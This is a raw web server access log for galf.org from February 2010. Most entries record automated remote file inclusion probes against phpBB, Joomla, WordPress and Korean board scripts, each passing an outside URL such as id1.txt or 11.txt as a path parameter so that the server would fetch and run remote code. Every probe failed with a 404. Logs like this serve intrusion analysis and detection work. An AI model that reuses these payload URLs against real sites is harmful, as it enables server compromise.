82.186.191.218 - - [01/Feb/2010:03:02:17 -0800] "GET //modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.186.191.218 - - [01/Feb/2010:03:02:17 -0800] "GET /logs/access_090914.log%20%20///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:03:02:59 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:03:03:00 -0800] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:35 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:35 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:35 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:44 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:44 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:44 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:51 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:51 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:03:51 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:04:03 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:04:03 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:04:03 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.186.191.218 - - [01/Feb/2010:03:04:14 -0800] "GET /logs/access_091102.log///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:04:26 -0800] "GET /logs//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:04:26 -0800] "GET /components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:04:26 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:05:50 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:05:50 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:05:50 -0800] "GET /logs/access_090824.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.33 - - [01/Feb/2010:03:06:46 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts-AskJeevesJapan; .NET CLR 1.1.4322)" "galf.org"
79.98.23.9 - - [01/Feb/2010:03:07:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:07:12 -0800] "GET /logs/access_090824.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:07:12 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:03:08:40 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.186.191.218 - - [01/Feb/2010:03:08:49 -0800] "GET /logs/access_091026.log///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.186.191.218 - - [01/Feb/2010:03:08:49 -0800] "GET /logs/access_090914.log///modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:09:03 -0800] "GET /logs/access.log//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:09:18 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:09:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:09:18 -0800] "GET /logs/access_090824.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:09:51 -0800] "GET /logs/access.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:09:51 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:09:51 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [01/Feb/2010:03:10:31 -0800] "GET /components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [01/Feb/2010:03:10:32 -0800] "GET /logs//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [01/Feb/2010:03:10:32 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:10:40 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:10:40 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:10:40 -0800] "GET /logs/access.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:11:11 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:11:11 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [01/Feb/2010:03:11:12 -0800] "GET /logs/access.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [01/Feb/2010:03:12:42 -0800] "GET /logs/access_091214.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:12:43 -0800] "GET /logs/access_091214.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:13:09 -0800] "GET /logs/access_091214.log//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:13:25 -0800] "GET /logs/access_091214.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:13:34 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:13:37 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:13:58 -0800] "GET /logs/access_091214.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:14:02 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [01/Feb/2010:03:14:02 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [01/Feb/2010:03:14:02 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:08 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:08 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:08 -0800] "GET /logs/access_091123.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:16 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:16 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:16 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:16 -0800] "GET /logs/access_091123.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:22 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:22 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:22 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:14:22 -0800] "GET /logs/access_091123.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:03:14:29 -0800] "GET /logs/access_090727.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:14:36 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:03:14:48 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:14:57 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:15:07 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:15:42 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:03:15:49 -0800] "GET /logs/access_090727.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:16:08 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:16:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:16:08 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:16:33 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:16:33 -0800] "GET /logs/access_090803.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:16:33 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:03:16:54 -0800] "GET /logs/access_090803.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:03:16:55 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:03:16:55 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:17:08 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:17:11 -0800] "GET /logs/access_091012.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:17:17 -0800] "GET /logs/access_090803.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:17:17 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:17:17 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:17:29 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:17:29 -0800] "GET /logs/access_090803.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:17:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:17:48 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:17:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:17:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:01 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:01 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:01 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:03 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:03 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:03 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:18:37 -0800] "GET /logs/access_090803.log//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:18:37 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:18:37 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:42 -0800] "GET /logs/access_091012.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:18:54 -0800] "GET /logs/access_091012.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.207.177.222 - - [01/Feb/2010:03:20:48 -0800] "GET /logs/access_090720.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [01/Feb/2010:03:20:51 -0800] "GET /logs/access.log//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:21:18 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:21:18 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:21:18 -0800] "GET /logs/access_090803.log%20%20//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Feb/2010:03:21:58 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Feb/2010:03:21:58 -0800] "GET /components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Feb/2010:03:21:59 -0800] "GET /logs//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:22:05 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:22:05 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:22:05 -0800] "GET /logs/access_091019.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
